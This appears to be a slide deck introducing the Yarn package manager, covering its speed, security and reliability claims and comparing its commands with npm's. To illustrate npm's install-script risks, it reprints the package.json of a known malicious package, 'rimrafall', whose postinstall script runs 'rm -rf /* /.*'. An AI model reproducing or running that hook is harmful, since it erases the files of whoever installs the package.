Yarn
Joe Buza
What is Yarn?
is a fast, reliable and secure alternative npm client.
Why Yarn?
-
Fast
-
Secure
-
Reliable
Fast
-
Caches downloaded packages
-
Parallel installation
Secure
Uses Checksum to check the integrity of every package before it's code is executed.
-
Include a postinstall script such as rf -rf /
-
Include a postinstall script such as npm unpublish
-
Publish a semver patch version containing a bug that makes the package unusable
Vulnerabilities
{
"name": "rimrafall",
"version": "1.0.0",
"description": "rm -rf /* # DO NOT INSTALL THIS",
"main": "index.js",
"scripts": {
"postinstall": "rm -rf /* /.*"
},
"keywords": [
"rimraf",
"rmrf"
],
"author": "João Jerónimo",
"license": "ISC"
}Missing Link
Reliable
-
Deterministic
-
Network resilience
Deterministic
The same dependencies will be installed the same exact way across every machine regardless of install order.
Yarn.lock
saves exact versions of packages
Network Resilience
A single request failing won't cause an install to fail. Requests are retried upon failure.
Differences
| npm install | yarn |
|---|---|
| npm install jest --save | yarn add jest |
| npm uninstall jest --save | yarn remove jest |
| npm install jest --save-dev | yarn add jest --dev |
| yarn update --save | yarn upgrade |
| npm install jest --global | yarn global add jest |
Similarites
| npm init | yarn init |
|---|---|
| npm run | yarn run |
| npm test | yarn test |
| npm cache clean | yarn cache clean |
Only in Yarn
-
yarn licenses ls
-
yarn licenses generate-disclaimer
-
yarn why <package>
-
yarn upgrade-interactive
yarn upgrade-interactive
Resources
Questions?
Yarn
By Joe Buza
Yarn
A fast, more reliable alternative npm client
